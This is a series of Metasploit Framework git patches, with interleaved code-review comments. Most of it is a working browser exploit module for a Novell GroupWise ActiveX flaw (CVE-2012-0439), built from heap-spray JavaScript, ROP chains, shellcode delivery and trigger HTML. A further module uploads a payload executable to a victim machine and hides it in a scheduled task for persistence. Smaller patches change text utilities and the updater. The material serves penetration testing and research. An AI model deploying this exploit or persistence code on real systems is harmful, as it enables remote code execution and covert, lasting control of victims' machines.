@@ -0,0 +1,309 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :rank => NormalRanking, + :classid => "{601D7813-408F-11D1-98D7-444553540000}", + :method => "SetEngine" + }) + + + def initialize(info={}) + super(update_info(info, + 'Name' => "Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability in the Novell GroupWise Client gwcls1.dll + ActiveX. Several methods in the GWCalServer control use user provided data as + a pointer, which allows to read arbitrary memory and execute arbitrary code. This + module has been tested successfully with GroupWise Client 2012 on IE6 - IE9. The + JRE6 needs to be installed to achieve ASLR bypass. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'rgod <rgod[at]autistici.org>', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-0439' ], + [ 'OSVDB', '89700' ], + [ 'BID' , '57658' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-008' ], + [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7011688' ] + ], + 'Payload' => + { + 'BadChars' => "\x00", + 'Space' => 1040, + 'DisableNops' => true + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f' + }, + 'Platform' => 'win', + 'Targets' => + [ + # gwcls1.dll 12.0.0.8586 + [ 'Automatic', {} ], + [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], + [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ], + [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x3e3' } ], + [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ], + [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], + [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3e3' } ], + [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x3ed' } ]#'0x5fe' } ] + ], + 'Privileged' => false, + 'DisclosureDate' => "Jan 30 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) + ], self.class) + + end + + def get_target(agent) + #If the user is already specified by the user, we'll just use that + return target if target.name != 'Automatic' + + nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' + ie = agent.scan(/MSIE (\d)/).flatten[0] || '' + + ie_name = "IE #{ie}" + + case nt + when '5.1' + os_name = 'Windows XP SP3' + when '6.0' + os_name = 'Windows Vista' + when '6.1' + os_name = 'Windows 7' + end + + targets.each do |t| + if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? 
and t.name.include?(os_name)) + print_status("Target selected as: #{t.name}") + return t + end + end + + return nil + end + + def ie_heap_spray(my_target, p) + js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) + js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) + js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) + + # Land the payload at 0x0c0c0c0c + case my_target + when targets[7] + # IE 9 on Windows 7 + js = %Q| + function randomblock(blocksize) + { + var theblock = ""; + for (var i = 0; i < blocksize; i++) + { + theblock += Math.floor(Math.random()*90)+10; + } + return theblock; + } + + function tounescape(block) + { + var blocklen = block.length; + var unescapestr = ""; + for (var i = 0; i < blocklen-1; i=i+4) + { + unescapestr += "%u" + block.substring(i,i+4); + } + return unescapestr; + } + + var heap_obj = new heapLib.ie(0x10000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_random_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset_length = #{my_target['Offset']}; + for (var i=0; i < 0x1000; i++) { + var padding = unescape(tounescape(randomblock(0x1000))); + while (padding.length < 0x1000) padding+= padding; + var junk_offset = padding.substring(0, offset_length); + var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); + while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; + sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); + heap_obj.alloc(sprayblock); + } + | + + else + # For IE 6, 7, 8 + js = %Q| + var heap_obj = new heapLib.ie(0x20000); + var code = unescape("#{js_code}"); + var nops = unescape("#{js_nops}"); + while (nops.length < 0x80000) nops += nops; + var offset = nops.substring(0, #{my_target['Offset']}); + var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); + while (shellcode.length < 0x40000) shellcode += 
shellcode; + var block = shellcode.substring(0, (0x80000-6)/2); + heap_obj.gc(); + for (var i=1; i < 0x300; i++) { + heap_obj.alloc(block); + } + var overflow = nops.substring(0, 10); + | + + end + + js = heaplib(js, {:noobfu => true}) + + if datastore['OBFUSCATE'] + js = ::Rex::Exploitation::JSObfu.new(js) + js.obfuscate + end + + return js + end + + def stack_pivot + pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + return pivot + end + + def get_payload(t, cli) + code = payload.encoded + + # No rop. Just return the payload. + return [0x0c0c0c10 - 0x426].pack("V") + [0x0c0c0c14].pack("V") + code if t['Rop'].nil? + + # Both ROP chains generated by mona.py - See corelan.be + case t['Rop'] + when :msvcrt + print_status("Using msvcrt ROP") + rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea + jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string + rop_payload << jmp_shell + rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) + rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset + rop_payload << [0x77c15ed5].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret + rop_payload << stack_pivot + rop_payload << code + else + print_status("Using JRE ROP") + rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea + jmp_shell = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+#{0x0c0c0c14 - 0x0c0c07ea - rop_payload.length}").encode_string + rop_payload << jmp_shell + rop_payload << rand_text_alpha(0x0c0c0c0c - 0x0c0c07ea- rop_payload.length) + rop_payload << [0x0c0c0c10 - 0x426].pack("V") # Mapped at 0x0c0c0c0c # 0x426 => vtable offset + rop_payload << 
[0x7C348B05].pack("V") # Mapped at 0x0c0c0c10 # xchg eax, esp # ret + rop_payload << stack_pivot + rop_payload << code + end + + return rop_payload + end + + + def load_exploit_html(my_target, cli) + p = get_payload(my_target, cli) + js = ie_heap_spray(my_target, p) + + trigger = "target.GetNXPItem(\"22/10/2013\", 1, 1);" * 200 + + html = %Q| + <html> + <head> + <script> + #{js} + </script> + </head> + <body> + <object classid='clsid:601D7813-408F-11D1-98D7-444553540000' id ='target'> + </object> + <script> + target.SetEngine(0x0c0c0c0c-0x20); + setInterval(function(){#{trigger}},1000); + </script> + </body> + </html> + | + + return html + end + + def on_request_uri(cli, request) + agent = request.headers['User-Agent'] + uri = request.uri + print_status("Requesting: #{uri}") + + my_target = get_target(agent) + # Avoid the attack if no suitable target found + if my_target.nil? + print_error("Browser not supported, sending 404: #{agent}") + send_not_found(cli) + return + end + + html = load_exploit_html(my_target, cli) + html = html.gsub(/^\t\t/, '') + print_status("Sending HTML...") + send_response(cli, html, {'Content-Type'=>'text/html'}) + end + +end + + +=begin + +* Remote Code Exec + +.text:103BDDEC mov eax, [ebp+var_4] // var_4 => Engine + 0x20 +.text:103BDDEF test esi, esi +.text:103BDDF1 jnz short loc_103BDE17 +.text:103BDDF3 cmp [eax+426h], esi +.text:103BDDF9 jz short loc_103BDE17 // Check function pointer against nil? +.text:103BDDFB mov ecx, [ebp+arg_8] +.text:103BDDFE mov edx, [ebp+arg_4] +.text:103BDE01 push ecx +.text:103BDE02 mov ecx, [eax+42Ah] // Carefully crafted object allows to control it +.text:103BDE08 push edx +.text:103BDE09 mov edx, [eax+426h] // Carefully crafted object allows to control it +.text:103BDE0F push ecx +.text:103BDE10 call edx // Win! + +* Info Leak + +// Memory disclosure => 4 bytes from an arbitrary address +// Unstable when info leaking and triggering rce path... 
+target.SetEngine(0x7ffe0300-0x45c); // Disclosing ntdll +var leak = target.GetMiscAccess(); +alert(leak); + +=end \ No newline at end of file From 17b349ab50bb6705b64eadb66d4a8c229a3b8d42 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sat, 9 Feb 2013 17:49:57 +0100 Subject: [PATCH 337/421] added crash to comments --- .../windows/browser/novell_groupwise_gwcls1_actvx.rb | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb index a3f50861e8ba..1b6971b5c26a 100644 --- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb +++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb @@ -284,6 +284,17 @@ def on_request_uri(cli, request) * Remote Code Exec +(240.8d4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\PROGRA~1\Novell\GROUPW~1\gwenv1.dll - +eax=00000000 ebx=0c0c0bec ecx=030c2998 edx=030c2998 esi=0c0c0bec edi=0013df58 +eip=10335e2d esp=0013de04 ebp=0013de8c iopl=0 nv up ei pl nz na po nc +cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202 +gwenv1!NgwOFErrorEnabledVector<NgwOFAttribute>::SetParent+0x326b9d: +10335e2d 8a8e4f040000 mov cl,byte ptr [esi+44Fh] ds:0023:0c0c103b=?? + + .text:103BDDEC mov eax, [ebp+var_4] // var_4 => Engine + 0x20 .text:103BDDEF test esi, esi .text:103BDDF1 jnz short loc_103BDE17 From acdd952eb22bb4de33f7541611561a9f41973127 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sat, 9 Feb 2013 21:50:12 +0000 Subject: [PATCH 338/421] Initial commit --- lib/rex/text.rb | 71 +++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 57 insertions(+), 14 deletions(-) 
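Review bot: In get_target, `os_name` is assigned only in the `case nt` branches for 5.1, 6.0 and 6.1, so a User-Agent that reports any other Windows NT version leaves it nil while `nt` is non-empty, and `t.name.include?(os_name)` then raises TypeError as soon as the IE half of the condition matches. The User-Agent header is client-controlled input, and the intended path for an unrecognised client is the `return nil` at the end of get_target followed by the 404 in on_request_uri. Add an `else` branch to the `case` that does `return nil`, so unknown versions take that path instead of raising inside the request handler.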
diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 37137e7af330..95d465283a9b 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -39,8 +39,8 @@ module Text UpperAlpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" LowerAlpha = "abcdefghijklmnopqrstuvwxyz" Numerals = "0123456789" - Base32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567" - Alpha = UpperAlpha + LowerAlpha + Base32 = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567" + Alpha = UpperAlpha + LowerAlpha AlphaNumeric = Alpha + Numerals HighAscii = [*(0x80 .. 0xff)].pack("C*") LowAscii = [*(0x00 .. 0x1f)].pack("C*") 
@@ -307,16 +307,16 @@ def self.to_hex_ascii(str, prefix = "\\x", count = 1, suffix=nil) # # Supported unicode types include: utf-16le, utf16-be, utf32-le, utf32-be, utf-7, and utf-8 # - # Providing 'mode' provides hints to the actual encoder as to how it should encode the string. Only UTF-7 and UTF-8 use "mode". + # Providing 'mode' provides hints to the actual encoder as to how it should encode the string. Only UTF-7 and UTF-8 use "mode". # # utf-7 by default does not encode alphanumeric and a few other characters. By specifying the mode of "all", then all of the characters are encoded, not just the non-alphanumeric set. # to_unicode(str, 'utf-7', 'all') # # utf-8 specifies that alphanumeric characters are used directly, eg "a" is just "a". However, there exist 6 different overlong encodings of "a" that are technically not valid, but parse just fine in most utf-8 parsers. (0xC1A1, 0xE081A1, 0xF08081A1, 0xF8808081A1, 0xFC80808081A1, 0xFE8080808081A1). How many bytes to use for the overlong enocding is specified providing 'size'. - # to_unicode(str, 'utf-8', 'overlong', 2) + # to_unicode(str, 'utf-8', 'overlong', 2) # - # Many utf-8 parsers also allow invalid overlong encodings, where bits that are unused when encoding a single byte are modified. Many parsers will ignore these bits, rendering simple string matching to be ineffective for dealing with UTF-8 strings. There are many more invalid overlong encodings possible for "a". For example, three encodings are available for an invalid 2 byte encoding of "a". (0xC1E1 0xC161 0xC121). By specifying "invalid", a random invalid encoding is chosen for the given byte size. - # to_unicode(str, 'utf-8', 'invalid', 2) + # Many utf-8 parsers also allow invalid overlong encodings, where bits that are unused when encoding a single byte are modified. Many parsers will ignore these bits, rendering simple string matching to be ineffective for dealing with UTF-8 strings. 
There are many more invalid overlong encodings possible for "a". For example, three encodings are available for an invalid 2 byte encoding of "a". (0xC1E1 0xC161 0xC121). By specifying "invalid", a random invalid encoding is chosen for the given byte size. + # to_unicode(str, 'utf-8', 'invalid', 2) # # utf-7 defaults to 'normal' utf-7 encoding # utf-8 defaults to 2 byte 'normal' encoding @@ -360,7 +360,7 @@ def self.to_unicode(str='', type = 'utf-16le', mode = '', size = '') string = '' str.each_byte { |a| if (a < 21 || a > 0x7f) || mode != '' - # ugh. turn a single byte into the binary representation of it, in array form + # ugh. turn a single byte into the binary representation of it, in array form bin = [a].pack('C').unpack('B8')[0].split(//) # even more ugh. @@ -658,6 +658,49 @@ def self.to_hex_dump(str, width=16) buf << "\n" end + # + # Converts a string a nicely formatted and addressed ex dump + # + def self.to_addr_hex_dump(str, start_addr=0, width=16) + buf = '' + idx = 0 + cnt = 0 + snl = false + lst = 0 + addr = start_addr + + while (idx < str.length) + + buf << "%08x" % addr + buf << " " * 4 + chunk = str[idx, width] + line = chunk.unpack("H*")[0].scan(/../).join(" ") + buf << line + + if (lst == 0) + lst = line.length + buf << " " * 4 + else + buf << " " * ((lst - line.length) + 4).abs + end + + chunk.unpack("C*").each do |c| + if (c > 0x1f and c < 0x7f) + buf << c.chr + else + buf << "." + end + end + + buf << "\n" + + idx += width + addr += width + end + + buf << "\n" + end + # # Converts a hex string to a raw string # 
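Review bot: to_addr_hex_dump initialises `cnt = 0` and `snl = false` and never reads either, and its header comment is garbled ("Converts a string a nicely formatted and addressed ex dump"). Drop the two locals and reword the comment to something like `# Converts a string to a formatted hex dump with an address column`, adding that `start_addr` is the address printed for the first row and `width` is the number of bytes per row. The method appears to mirror to_hex_dump, whose body is outside this hunk, so sharing the row formatting between the two would avoid the copies drifting apart.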
@@ -691,20 +734,20 @@ def self.wordwrap(str, indent = 0, col = DefaultWrap, append = '', prepend = '') # Converts a string to a hex version with wrapping support # def self.hexify(str, col = DefaultWrap, line_start = '', line_end = '', buf_start = '', buf_end = '') - output = buf_start - cur = 0 - count = 0 + output = buf_start + cur = 0 + count = 0 new_line = true # Go through each byte in the string str.each_byte { |byte| count += 1 - append = '' + append = '' # If this is a new line, prepend with the # line start text if (new_line == true) - append << line_start + append << line_start new_line = false end @@ -716,7 +759,7 @@ def self.hexify(str, col = DefaultWrap, line_start = '', line_end = '', buf_star # time to finish up this line if ((cur + line_end.length >= col) or (cur + buf_end.length >= col)) new_line = true - cur = 0 + cur = 0 # If this is the last byte, use the buf_end instead of # line_end @@ -1277,7 +1320,7 @@ def self.split_to_a(str, n) else ret = str end - ret + ret end # From 73f136ef9a8161deb2dda0a3d6b59ea0fb2aa1f3 Mon Sep 17 00:00:00 2001 From: Brandon Turner <brandon_turner@rapid7.com> Date: Mon, 4 Feb 2013 15:01:35 -0600 Subject: [PATCH 339/421] Update msfupdate to work with debian packages If apt was used to install framework, use apt-get to update. --- msfupdate | 43 +++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 41 insertions(+), 2 deletions(-) diff --git a/msfupdate b/msfupdate index 058fd8f51eaa..6b168d009129 100755 --- a/msfupdate +++ b/msfupdate @@ -30,9 +30,13 @@ if not (Process.uid == 0 or File.stat(msfbase).owned?) exit 0x10 end +def is_apt + File.exists?(File.expand_path(File.join(@msfbase_dir, '.apt'))) +end + # Are you an installer, or did you get here via a source checkout? def is_installed - File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))) + File.exists?(File.expand_path(File.join(@msfbase_dir, "..", "engine", "update.rb"))) && !is_apt end def is_git 
@@ -69,6 +73,24 @@ def maybe_wait_and_exit(exit_code=0) end end +def apt_upgrade_available(package) + require 'open3' + installed = nil + upgrade = nil + ::Open3.popen3("apt-cache", "policy", package) do |stdin, stdout, stderr| + stdout.each do |line| + installed = $1 if line =~ /Installed: ([\w\-+.:~]+)$/ + upgrade = $1 if line =~ /Candidate: ([\w\-+.:~]+)$/ + break if installed && upgrade + end + end + if installed && installed != upgrade + upgrade + else + nil + end +end + # Some of these args are meaningful for SVN, some for Git, # some for both. Fun times. @args.each_with_index do |arg,i| @@ -186,7 +208,24 @@ if is_installed end end -unless is_svn || is_git || is_installed +if is_apt + $stdout.puts "[*] Checking for updates" + system("apt-get", "-qq", "update") + + packages = [] + packages << 'metasploit-framework' if framework_version = apt_upgrade_available('metasploit-framework') + packages << 'metasploit' if pro_version = apt_upgrade_available('metasploit') + + if packages.empty? + $stdout.puts "[*] No updates available" + else + $stdout.puts "[*] Updating to version #{pro_version || framework_version}" + system("apt-get", "install", "--assume-yes", *packages) + system("/etc/init.d/metasploit start") if packages.include?('metasploit') + end +end + +unless is_svn || is_git || is_installed || is_apt raise RuntimeError, "Cannot determine checkout type: `#{@msfbase_dir}'" end From 3a499b1a6df332e4751f8fd8a3bd39bf3fb9988b Mon Sep 17 00:00:00 2001 From: smilingraccoon <smilingraccoon.gmail.com> Date: Sun, 10 Feb 2013 14:22:36 -0500 Subject: [PATCH 340/421] added s4u_persistence.rb --- data/exploits/s4u_persistence | 50 +++ .../exploits/windows/local/s4u_persistence.rb | 402 ++++++++++++++++++ 2 files changed, 452 insertions(+) create mode 100644 data/exploits/s4u_persistence create mode 100644 modules/exploits/windows/local/s4u_persistence.rb 
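Review bot: In the new `if is_apt` block none of the `system` results are checked, so a failed `apt-get update` or `apt-get install` (no network, dpkg lock held, signature or dependency error) still falls through, and `/etc/init.d/metasploit start` runs as though the update had succeeded. This script normally runs as root and is the product's update path, so each step should stop on failure: guard the calls with `unless system(...)`, print the error, and leave through `maybe_wait_and_exit` with a non-zero code. The argument-list form of `system` used for the apt-get calls avoids a shell and should be kept. The "Updating to version" message prints `pro_version || framework_version`, which names only one version when both packages are upgraded.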
diff --git a/data/exploits/s4u_persistence b/data/exploits/s4u_persistence
new file mode 100644
index 000000000000..2d736d225e64
--- /dev/null
+++ b/data/exploits/s4u_persistence
@@ -0,0 +1,50 @@
+<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <RegistrationInfo>
+ <Date>DATEHERE</Date>
+ <Author>USERHERE</Author>
+ </RegistrationInfo>
+ <Triggers>
+ <TimeTrigger>
+ <Repetition>
+ <Interval>PT60M</Interval>
+ <StopAtDurationEnd>false</StopAtDurationEnd>
+ </Repetition>
+ <StartBoundary>DATEHERE</StartBoundary>
+ <Enabled>true</Enabled>
+ </TimeTrigger>
+ </Triggers>
+ <Principals>
+ <Principal id="Author">
+ <UserId>DOMAINHERE</UserId>
+ <LogonType>S4U</LogonType>
+ <RunLevel>LeastPrivilege</RunLevel>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+ <AllowHardTerminate>true</AllowHardTerminate>
+ <StartWhenAvailable>false</StartWhenAvailable>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <Duration>PT10M</Duration>
+ <WaitTimeout>PT1H</WaitTimeout>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>true</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ </Settings>
+ <Actions Context="Author">
+ <Exec>
+ <Command>COMMANDHERE</Command>
+ </Exec>
+ </Actions>
+</Task>
\ No newline at end of file
diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb
new file mode 100644
index 000000000000..0d5189064ac6
--- /dev/null
+++ b/modules/exploits/windows/local/s4u_persistence.rb
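Review bot: The placeholder names in this template do not say what they receive: create_xml in s4u_persistence.rb (same commit) substitutes the bare user name for `DOMAINHERE` inside `<UserId>` and `domain\user` for `USERHERE` inside `<Author>`. Add a comment directly after the XML declaration listing the four tokens (`DATEHERE`, `USERHERE`, `DOMAINHERE`, `COMMANDHERE`) and what replaces each, or rename `DOMAINHERE` to match its content in both files. The substitutions are plain string replacements, so a value containing `&` or `<` would produce a malformed task definition; the comment should say that values are expected to be XML-safe.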
@@ -0,0 +1,402 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/windows/priv' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Priv + include Exploit::EXE + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage User Level Persistent Payload Installer', + 'Description' => %q{ + Creates a scheduled task that will run using service-for-user (S4U). + This allows the scheduled task to run even as an unprivileged user + that is not logged into the device. This will result in lower security + context, allowing access to local resources only. The module + requires 'Logon as a batch job' permissions (SeBatchLogonRight). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>', + 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>' + ], + 'Platform' => [ 'windows' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'References' => [ + [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], + [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/'] + ] + )) + + register_options( + [ + OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']), + OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires']), + OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['logon', 'lock', 'unlock','schedule', 'event']]), + OptString.new('REXENAME',[false, 'Name of exe on remote system']), + OptString.new('RTASKNAME',[false, 'Name of exe on remote system']), + OptString.new('PATH',[false, 'PATH to write payload']) + ], self.class) + + register_advanced_options( + [ + OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']), + OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']), + OptString.new('XPATH', [false, 'XPath query']) + ], self.class) + end + + def exploit + if not (sysinfo['OS'] =~ /Build [6-9]\d\d\d/) + print_error("This module only works on Vista/2008 and above") + return + end + + if datastore['TRIGGER'] == "event" + if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil? 
+ print_error("Advanced options EVENT_LOG and EVENT_ID required for event") + print_status("The properties of any event in the event viewer will contain this information") + return + end + end + + # Generate payload + payload = generate_payload_exe + + # Generate remote executable name + rexename = generate_rexename + + # Generate path names + xml_path,rexe_path = generate_path(rexename) + + # Upload REXE to victim fs + upload_response = upload_rexe(rexe_path, payload) + return if not upload_response + + # Create basic XML outline + xml = create_xml(rexe_path) + + # Fix XML based on trigger + xml = add_xml_triggers(xml) + + # Write XML to victim fs, if fail clean up + if not write_xml(xml, xml_path) + delete_file(rexe_path) + return + end + + # Name task with Opt or give random name + schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + + # Create task with modified XML + task = create_task(xml_path, schname, rexe_path) + end + + ############################################################## + # Generate name for payload + # Returns name + + def generate_rexename + if datastore['REXENAME'].nil? 
+ rexename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe" + return rexename + elsif datastore['REXENAME'] =~ /\.exe$/ + rexename = datastore['REXENAME'] + return rexename + else + print_warning("#{datastore['REXENAME']} isn't an exe") + return rexename + end + end + + ############################################################## + # Generate Path for payload upload + # Returns path for xml and payload + + def generate_path(rexename) + # generate a path to write payload and xml + path = datastore['PATH'] || session.fs.file.expand_path("%TEMP%") + xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml" + rexe_path = "#{path}\\#{rexename}" + return xml_path,rexe_path + end + + ############################################################## + # Upload the executable payload + # Returns boolean for success + + def upload_rexe(path, payload) + vprint_status("Uploading #{path}") + if file? path + print_error("File #{path} already exists...exiting") + return false + end + begin + fd = client.fs.file.new(path, "wb") + fd.write(payload) + fd.close + rescue + print_error("Could not upload to #{path}") + return false + end + print_status("Successfully uploaded remote executable to #{path}") + return true + end + + ############################################################## + # Creates a scheduled task, exports as XML, deletes task + # Returns normal XML for generic task + + def create_xml(rexe_path) + xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence") + xml_file = File.new(xml_path,"r") + xml = xml_file.read + xml_file.close + + # Get local time, not system time from victim machine + begin + vt = client.railgun.kernel32.GetLocalTime(32) + ut = vt['lpSystemTime'].unpack("v*") + t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) + rescue + print_warning("Could not read system time from victim...using your local time to determine expire date") + t = ::Time.now + end + date = t.strftime("%Y-%m-%d") + time = t.strftime("%H:%M:%S") + + 
# put in correct times + xml = xml.gsub(/DATEHERE/, "#{date}T#{time}") + + domain, user = client.sys.config.getuid.split('\\') + + # put in user information + xml = xml.sub(/DOMAINHERE/, user) + xml = xml.sub(/USERHERE/, "#{domain}\\#{user}") + + xml = xml.sub(/COMMANDHERE/, rexe_path) + return xml + end + + ############################################################## + # Takes the XML, alters it based on trigger specified. Will also + # add in expiration tag if used. + # Returns the modified XML + + def add_xml_triggers(xml) + # Insert trigger + case datastore['TRIGGER'] + when 'logon' + # Trigger based on winlogon event, checks windows license key after logon + print_status("This trigger triggers on event 4101 which validates the Windows license") + line = "(EventID=4101) and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]" + xml = create_trigger_event_tags("Application", line, xml) + + when 'lock' + xml = create_trigger_tags("SessionLock", xml) + + when 'unlock' + xml = create_trigger_tags("SessionUnlock", xml) + + when 'event' + line = "*[System[(EventID=#{datastore['EVENT_ID']})]]" + if not datastore['XPATH'].nil? 
+ # Append xpath queries + line << " and #{datastore['XPATH']}" + end + vprint_status("XPath query: #{line}") + + xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml) + + when 'schedule' + # Change interval tag, insert into XML + if datastore['FREQUENCY'] != 0 + minutes = datastore['FREQUENCY'] + else + print_status("Defaulting frequency to every hour") + minutes = 60 + end + xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<") + + # Generate expire tag + end_boundary = create_expire_tag if datastore['EXPIRE_TIME'] + + # Inject expire tag + insert = xml.index("</StartBoundary>") + xml.insert(insert + 16, "\n #{end_boundary}") + end + return xml + end + + ############################################################## + # Creates end boundary tag which expires the trigger + # Returns XML for expire + + def create_expire_tag() + # Get local time, not system time from victim machine + begin + vt = client.railgun.kernel32.GetLocalTime(32) + ut = vt['lpSystemTime'].unpack("v*") + t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) + rescue + print_error("Could not read system time from victim...using your local time to determine expire date") + t = ::Time.now + end + + # Create time object to add expire time to and create tag + t = t + (datastore['EXPIRE_TIME'] * 60) + date = t.strftime("%Y-%m-%d") + time = t.strftime("%H:%M:%S") + end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>" + return end_boundary + end + + ############################################################## + # Creates trigger XML for session state triggers and replaces + # the time trigger. 
